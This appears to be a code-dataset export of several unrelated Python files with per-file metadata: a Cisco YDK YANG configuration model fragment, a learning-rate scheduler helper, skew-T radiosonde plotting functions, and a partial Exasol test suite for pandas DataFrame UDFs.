self.multicast = Rcc.Ipv4.Multicast()
self.multicast.parent = self
self._children_name_map["multicast"] = "multicast"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4, [], name, value)
class Lcc(_Entity_):
"""
IPv4/IPv6 LCC (Label Consistency Checker)
configuration
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4.Lcc, self).__init__()
self.yang_name = "lcc"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "lcc"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4.Lcc, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4.Lcc']['meta_info']
class Unicast(_Entity_):
"""
RCC configuration for unicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4.Unicast, self).__init__()
self.yang_name = "unicast"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4.Unicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4.Unicast']['meta_info']
class Multicast(_Entity_):
"""
RCC configuration for multicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4.Multicast, self).__init__()
self.yang_name = "multicast"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "multicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4.Multicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4.Multicast']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4']['meta_info']
def clone_ptr(self):
self._top_entity = Rcc()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc']['meta_info']
| 34.271739
| 173
| 0.521937
| 1,960
| 18,918
| 4.713265
| 0.067857
| 0.039835
| 0.049794
| 0.060078
| 0.908313
| 0.872158
| 0.863499
| 0.849643
| 0.849643
| 0.849643
| 0
| 0.020985
| 0.362723
| 18,918
| 551
| 174
| 34.333938
| 0.745272
| 0.184269
| 0
| 0.768683
| 0
| 0
| 0.102274
| 0.02887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099644
| false
| 0
| 0.060498
| 0
| 0.234875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
hexsha: 1d16e046daa300e7c2cd081c16a2a79ce730a94a | size: 244 | ext: py | lang: Python
max_stars: ana_lib/pl_utils.py @ mcmahon-lab/ONN-QAT-SQL (9c25d953b5bbe25ea6f469d01ecb914d131fc212), licenses ["CC-BY-4.0"], count 5, events 2021-05-18T15:59:21.000Z → 2022-03-29T03:01:09.000Z
max_issues: ana_lib/pl_utils.py @ mcmahon-lab/ONN-QAT-SQL (9c25d953b5bbe25ea6f469d01ecb914d131fc212), licenses ["CC-BY-4.0"], count null, events null → null
max_forks: ana_lib/pl_utils.py @ mcmahon-lab/ONN-QAT-SQL (9c25d953b5bbe25ea6f469d01ecb914d131fc212), licenses ["CC-BY-4.0"], count null, events null → null
content:
#Useful general functions
def default_scheduler(lr_scheduler):
return {'scheduler':lr_scheduler, 'monitor':'val_checkpoint_on'}
def default_scheduler2(lr_scheduler):
return {'scheduler':lr_scheduler, 'monitor':'asdfhakjsdhfjkahsdjfk'}
| 34.857143
| 72
| 0.790984
| 27
| 244
| 6.851852
| 0.518519
| 0.237838
| 0.324324
| 0.281081
| 0.475676
| 0.475676
| 0.475676
| 0
| 0
| 0
| 0
| 0.004505
| 0.090164
| 244
| 7
| 72
| 34.857143
| 0.828829
| 0.098361
| 0
| 0
| 0
| 0
| 0.318182
| 0.095455
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
hexsha: 1d3d9387cf786d93ed392f1068a55935df4fea0c | size: 66 | ext: py | lang: Python
max_stars: src/__init__.py @ OfekHarel/Horizon-Music (50c51b8f3bdf4e4703f56af943dcc1758d121efb), licenses ["MIT"], count null, events null → null
max_issues: src/__init__.py @ OfekHarel/Horizon-Music (50c51b8f3bdf4e4703f56af943dcc1758d121efb), licenses ["MIT"], count 2, events 2020-05-15T10:07:42.000Z → 2021-01-18T09:59:21.000Z
max_forks: src/__init__.py @ OfekHarel/HorizonMusic (50c51b8f3bdf4e4703f56af943dcc1758d121efb), licenses ["MIT"], count null, events null → null
content:
from .utils import *
from .music_utils import *
from .ui import *
| 16.5
| 26
| 0.727273
| 10
| 66
| 4.7
| 0.5
| 0.468085
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 66
| 3
| 27
| 22
| 0.87037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
hexsha: 1d9b55758ab55998fb421205a193bc000dfb3c61 | size: 6,235 | ext: py | lang: Python
max_stars: Radiosonde/plot_skewT.py @ franzihe/Python_Masterthesis (f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a), licenses ["MIT"], count null, events null → null
max_issues: Radiosonde/plot_skewT.py @ franzihe/Python_Masterthesis (f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a), licenses ["MIT"], count null, events null → null
max_forks: Radiosonde/plot_skewT.py @ franzihe/Python_Masterthesis (f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a), licenses ["MIT"], count null, events null → null
content:
# coding: utf-8
# In[ ]:
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.gridspec import GridSpec
import math
import pymeteo.interp as interp
import skewt_modi as skewt
# In[ ]:
### Define colorbar colors
champ = 255.
blue = np.array([1,74,159])/champ # for the date
memb_col_T = np.array([150,150,150])/champ # ensemble member color
memb_col_Td = np.array([173,255,47])/champ
# In[ ]:
def plot_skewT(T, Td, z, p, u, v, text, sfig, filename):
fig = plt.figure(1, figsize=(16, 20))#, edgecolor = 'k')
gs = GridSpec(1,12)
# sounding
ax1 = plt.subplot(gs[0,0:11])
skewt.plot_sounding_axes(ax1)
# plot Temperature
linecolor_T = skewt.linecolor_T
linewidth_T = skewt.linewidth_T
ax1.semilogy(T + skewt.skew(p),p, basey=math.e, color =linecolor_T, linewidth = (linewidth_T+1.5))
# plot dewpoint
linecolor_Td = skewt.linecolor_Td
linewidth_Td = skewt.linewidth_Td
ax1.semilogy(Td + skewt.skew(p), p, basey=math.e, color=linecolor_Td, linewidth = (linewidth_Td+1.5))
# wind barbs
ax4 = plt.subplot(gs[0,-1])
skewt.plot_wind_axes(ax4)
skewt.plot_wind_barbs(ax4,z,p,u,v)
# Add labels for levels based on surface parcel
Tmax = skewt.Tmax
Tmin = skewt.Tmin
# plot labels for std heights
# plevs_std = [100000,85000,70000,50000,40000,30000,25000,20000,15000]
plevs_std = skewt.plevs_std
for plvl in plevs_std:
zlvl = interp.interp_height(z,p,plvl)
skewt.label_m(Tmin+2.55,plvl, str(int(zlvl)), ax1)
# plot wind barbs on left side of plot. move this? right side?
pt_plot = 10000
if (u is not None and v is not None):
#draw_wind_line(axes)
for i in np.arange(0,len(z),2):
if (p[i] > pt_plot):
plt.barbs(Tmin+4,p[i],u[i],v[i], length=8, linewidth=2.)
# legend
ax5 = fig.add_subplot(1,1,1)
tT = r'Temperature'
lT = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_T+1.5), color=linecolor_T)
tTd = r'Dew-point Temperature'
lTd = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_Td+1.5), color=linecolor_Td)
plt.legend((lT, lTd,),(tT, tTd, ),
loc=(0.49,0.89), fontsize=24, handlelength=5)
ax5.set_axis_off()
# Adjust plot margins.
plt.subplots_adjust(left=0.03, bottom=0.03, right=0.97, top=0.97, wspace=0.12, hspace=0.12)
# set ylimit to 10000
# ax1.set_ylim([0,10000]
# ax4.set_ylim([0,10000]
# set day
ax1.text(0.98,0.96, text, # x, y
verticalalignment = 'bottom', horizontalalignment='right',
transform = ax1.transAxes,
color =blue, fontsize=30,
bbox={'facecolor':'white','alpha':.8, 'pad':10})
# savefig
if sfig == 1:
plt.savefig(filename,orientation = 'portrait', papertype = 'a4')#, dpi=300,bbox_inches=0)
plt.close()
def plot_skewT_EM(T, Td, z, p, u, v, hour, text, sfig, filename):
fig = plt.figure(1, figsize=(16, 20))#, edgecolor = 'k')
gs = GridSpec(1,12)
# sounding
ax1 = plt.subplot(gs[0,0:11])
skewt.plot_sounding_axes(ax1)
# plot Temperature
linecolor_T = skewt.linecolor_T
linewidth_T = skewt.linewidth_T
for ens_memb in range(1,10):
if len(T[ens_memb]) == 0:
continue
else:
ax1.semilogy(T[ens_memb][hour,:] +
skewt.skew(p[ens_memb][hour,:]), p[ens_memb][hour,:], basey=math.e,
color =memb_col_T, linewidth = (linewidth_T))
# plot dewpoint
linecolor_Td = skewt.linecolor_Td
linewidth_Td = skewt.linewidth_Td
for ens_memb in range(1,10):
if len(Td[ens_memb]) == 0:
continue
else:
ax1.semilogy( Td[ens_memb][hour,:] +
skewt.skew(p[ens_memb][hour,:]), p[ens_memb][hour,:], basey=math.e,
color=memb_col_Td, linewidth = (linewidth_Td))
ax1.semilogy(T[0][hour,:] + skewt.skew(p[0][hour,:]),p[0][hour,:], basey=math.e, color =linecolor_T, linewidth = (linewidth_T+1.5))
ax1.semilogy(Td[0][hour,:] + skewt.skew(p[0][hour,:]), p[0][hour,:], basey=math.e, color=linecolor_Td, linewidth = (linewidth_Td+1.5))
# wind barbs
ax4 = plt.subplot(gs[0,-1])
skewt.plot_wind_axes(ax4)
skewt.plot_wind_barbs(ax4,z[0][hour,:],p[0][hour,:],u[0][hour,:],v[0][hour,:])
# Add labels for levels based on surface parcel
Tmax = skewt.Tmax
Tmin = skewt.Tmin
# plot labels for std heights
# plevs_std = [100000,85000,70000,50000,40000,30000,25000,20000,15000]
plevs_std = skewt.plevs_std
for plvl in plevs_std:
zlvl = interp.interp_height(z[0][hour,:],p[0][hour,:],plvl)
skewt.label_m(Tmin+2.55,plvl, str(int(zlvl)), ax1)
# plot wind barbs on left side of plot. move this? right side?
pt_plot = 10000
if (u is not None and v is not None):
#draw_wind_line(axes)
for i in np.arange(0,len(z),2):
if (p[0][hour,:][i] > pt_plot):
plt.barbs(Tmin+4,p[0][hour,:][i],u[0][hour,:][i],v[0][hour,:][i], length=8, linewidth=2.)
# legend
ax5 = fig.add_subplot(1,1,1)
tT = r'Temperature'
lT = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_T+1.5), color=linecolor_T)
tTd = r'Dew-point Temperature'
lTd = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_Td+1.5), color=linecolor_Td)
plt.legend((lT, lTd,),(tT, tTd, ),
loc=(0.49,0.89), fontsize=24, handlelength=5)
ax5.set_axis_off()
# Adjust plot margins.
plt.subplots_adjust(left=0.03, bottom=0.03, right=0.97, top=0.97, wspace=0.12, hspace=0.12)
# set ylimit to 10000
# ax1.set_ylim([0,10000]
# ax4.set_ylim([0,10000]
# set day
ax1.text(0.98,0.96, text, # x, y
verticalalignment = 'bottom', horizontalalignment='right',
transform = ax1.transAxes,
color =blue, fontsize=30,
bbox={'facecolor':'white','alpha':.8, 'pad':10})
# savefig
if sfig == 1:
plt.savefig(filename,orientation = 'portrait', papertype = 'a4')#, dpi=300,bbox_inches=0)
else:
plt.show()
plt.close()
| 32.989418
| 138
| 0.616199
| 966
| 6,235
| 3.871636
| 0.199793
| 0.02139
| 0.012834
| 0.024064
| 0.860963
| 0.860963
| 0.851337
| 0.834759
| 0.823529
| 0.804278
| 0
| 0.080725
| 0.221171
| 6,235
| 188
| 139
| 33.164894
| 0.689456
| 0.156856
| 0
| 0.711712
| 0
| 0
| 0.029581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018018
| false
| 0
| 0.063063
| 0
| 0.081081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
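
The simpler per-file statistics in the schema (`avg_line_length`, `max_line_length`, `alphanum_fraction`) can be recomputed directly from `content`. A small sketch using straightforward definitions, which may differ in detail from the exact ones used to build this table:

```python
def simple_file_stats(content: str) -> dict:
    """Recompute a few of the schema's per-file statistics from the raw text."""
    lines = content.splitlines()
    lengths = [len(line) for line in lines] or [0]
    alphanumeric = sum(ch.isalnum() for ch in content)
    return {
        "avg_line_length": sum(lengths) / len(lengths),
        "max_line_length": max(lengths),
        "alphanum_fraction": alphanumeric / len(content) if content else 0.0,
    }
```
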
hexsha: d579b80a94a9b4e06283fbaf0d423f9fd18a94b6 | size: 34,808 | ext: py | lang: Python
max_stars: tests/test/python3/all/dataframe.py @ exasol/script-languages (c5fc636a4ce18310d96d8dc5c019da7d033dc6f1), licenses ["MIT"], count 6, events 2019-01-09T11:55:15.000Z → 2021-06-25T19:52:42.000Z
max_issues: tests/test/python3/all/dataframe.py @ exasol/script-languages (c5fc636a4ce18310d96d8dc5c019da7d033dc6f1), licenses ["MIT"], count 65, events 2018-12-12T08:40:38.000Z → 2022-02-28T09:19:45.000Z
max_forks: tests/test/python3/all/dataframe.py @ exasol/script-languages (c5fc636a4ce18310d96d8dc5c019da7d033dc6f1), licenses ["MIT"], count 9, events 2018-11-23T08:59:09.000Z → 2020-02-04T12:56:35.000Z
content:
#!/usr/bin/env python2.7
import os
import sys
from decimal import Decimal
from datetime import date
from datetime import datetime
sys.path.append(os.path.realpath(__file__ + '/../../../../lib'))
import udf
class PandasDataFrame(udf.TestCase):
def setUp(self):
self.query('CREATE SCHEMA FN2', ignore_errors=True)
self.query('OPEN SCHEMA FN2', ignore_errors=True)
self.create_col_defs = [
('C0','INT IDENTITY'),
('C1','Decimal(2,0)'),
('C2','Decimal(4,0)'),
('C3','Decimal(8,0)'),
('C4','Decimal(16,0)'),
('C5','Decimal(36,0)'),
('C6','DOUBLE'),
('C7','BOOLEAN'),
('C8','VARCHAR(500)'),
('C9','CHAR(10)'),
('C10','DATE'),
('C11','TIMESTAMP')
]
self.create_col_defs_str = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.create_col_defs
)
self.col_defs = self.create_col_defs[1:]
self.col_defs_str = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.col_defs
)
self.col_names = [name for name, type_decl in self.col_defs]
self.col_names_str = ','.join(self.col_names)
self.col_tuple = (
Decimal('1'),
Decimal('1234'),
Decimal('12345678'),
Decimal('1234567890123456'),
Decimal('123456789012345678901234567890123456'),
12345.6789,
True,
'abcdefghij',
'abcdefgh ',
date(2018, 10, 12),
datetime(2018, 10, 12, 12, 15, 30, 123000)
)
self.create_table_1()
self.create_table_2()
self.create_table_3()
def create_table(self,table_name,create_col_defs_str):
create_table_sql='CREATE TABLE %s (%s)' % (table_name,create_col_defs_str)
print("Create Table Statement %s"%create_table_sql)
self.query(create_table_sql)
def create_table_1(self):
self.create_table("TEST1",self.create_col_defs_str)
self.import_via_insert("TEST1",[self.col_tuple],column_names=self.col_names)
num_inserts = 9
for i in range(num_inserts):
insert_sql = 'INSERT INTO TEST1 (%s) SELECT %s FROM TEST1' % (self.col_names_str, self.col_names_str)
print("Insert Statement %s"%insert_sql)
self.query(insert_sql)
self.num_rows = 2**num_inserts
def create_table_2(self):
self.create_table("TEST2",self.create_col_defs_str)
self.col_tuple_1 = (
Decimal('1'),
Decimal('1'),
Decimal('1'),
Decimal('1'),
Decimal('1'),
1,
True,
'abcdefghij',
'abcdefgh ',
date(2018, 10, 12),
datetime(2018, 10, 12, 12, 15, 30, 123000)
)
self.import_via_insert("TEST2",[self.col_tuple_1],column_names=self.col_names)
self.col_tuple_2 = (
Decimal('1'),
Decimal('1234'),
Decimal('12345678'),
Decimal('1234567890123456'),
Decimal('123456789012345678901234567890123456'),
12345.6789,
True,
'abcdefghij',
'abcdefgh ',
date(2018, 10, 12),
datetime(2018, 10, 12, 12, 15, 30, 123000)
)
self.import_via_insert("TEST2",[self.col_tuple_2],column_names=self.col_names)
self.col_tuple_null = (None, None, None, None, None, None, None, None, None, None, None)
self.import_via_insert("TEST2",[self.col_tuple_null],column_names=self.col_names)
def create_table_3(self):
self.create_col_defs_3 = [
('C0','INT IDENTITY'),
('C1','INTEGER'),
]
self.create_col_defs_str_3 = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.create_col_defs_3
)
self.col_defs_3 = self.create_col_defs_3[1:]
self.col_defs_str_3 = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.col_defs_3
)
self.col_names_3 = [name for name, type_decl in self.col_defs_3]
self.col_names_str_3 = ','.join(self.col_names_3)
self.create_table("TEST3",self.create_col_defs_str_3)
self.test3_num_rows = 10
self.col_tuple_3 = [(i,) for i in range(self.test3_num_rows)]
self.import_via_insert("TEST3",self.col_tuple_3,column_names=self.col_names_3)
def test_dataframe_scalar_emits(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_scalar_returns(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
RETURNS DECIMAL(10,5) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe()
return np.asscalar(df.iloc[0, 0] + df.iloc[0, 1])
/
''' % (self.col_defs_str))
self.query(udf_sql)
print(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([(Decimal('1235'),)]*self.num_rows, rows)
def test_dataframe_scalar_emits_no_iter(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
df = ctx.get_dataframe()
df = ctx.get_dataframe()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_scalar_emits_col_names(self):
output_columns = 'X1 VARCHAR(5), X2 VARCHAR(5), X3 VARCHAR(5), X4 VARCHAR(5), X5 VARCHAR(5), X6 VARCHAR(5), X7 VARCHAR(5), X8 VARCHAR(5), X9 VARCHAR(5), X10 VARCHAR(5), X11 VARCHAR(5)'
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(*(df.columns.tolist()))
/
''' % (self.col_defs_str, output_columns))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([tuple(self.col_names)]*self.num_rows, rows)
def test_dataframe_scalar_emits_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(np.asscalar(df.C0))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_scalar_emits_all_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
ctx.emit(np.asscalar(df.C0))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_scalar_emits_empty(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit DataFrame is empty'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_scalar_emits_wrong_args0(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame([[]])
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(0 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_scalar_emits_wrong_args7(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
df = df.iloc[:, 1:]
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(10 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_set_returns(self):
from decimal import Decimal
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
RETURNS DECIMAL(10,5) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
return np.asscalar(df.iloc[:, 0].sum())
/
''' % (self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([(Decimal(self.num_rows),)], rows)
def test_dataframe_set_emits_iter(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
break
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_set_emits_iter_getattr(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(R VARCHAR(1000)) AS
def run(ctx):
BATCH_ROWS = 1
while True:
df = ctx.get_dataframe(num_rows=BATCH_ROWS)
if df is None:
break
ctx.emit(df.applymap(lambda x: "df_"+str(x)))
try:
ctx.emit("getattr_"+str(ctx.C1))
ctx.emit("eob") # end of batch
except:
ctx.emit("eoi") # end of iteration
/
''' % (self.col_defs_str_3))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST3' % (self.col_names_str_3)
print(select_sql)
rows = self.query(select_sql)
expected_result = [("df_"+str(self.col_tuple_3[0][0]),)]
for i in range(1,self.test3_num_rows):
expected_result.append(("getattr_"+str(self.col_tuple_3[i][0]),))
expected_result.append(("eob",))
expected_result.append(("df_"+str(self.col_tuple_3[i][0]),))
expected_result.append(("eoi",))
self.assertRowsEqual(expected_result, rows)
def test_dataframe_set_emits_iter_exception(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
#break
df = ctx.get_dataframe(num_rows=1)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'Iteration finished'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_iter_reset_at_end(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
i = 0
while True:
df = ctx.get_dataframe(num_rows=3)
if df is None:
if i < 1:
ctx.reset()
i = i + 1
else:
break
else:
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows*2, rows)
def test_dataframe_set_emits_col_names(self):
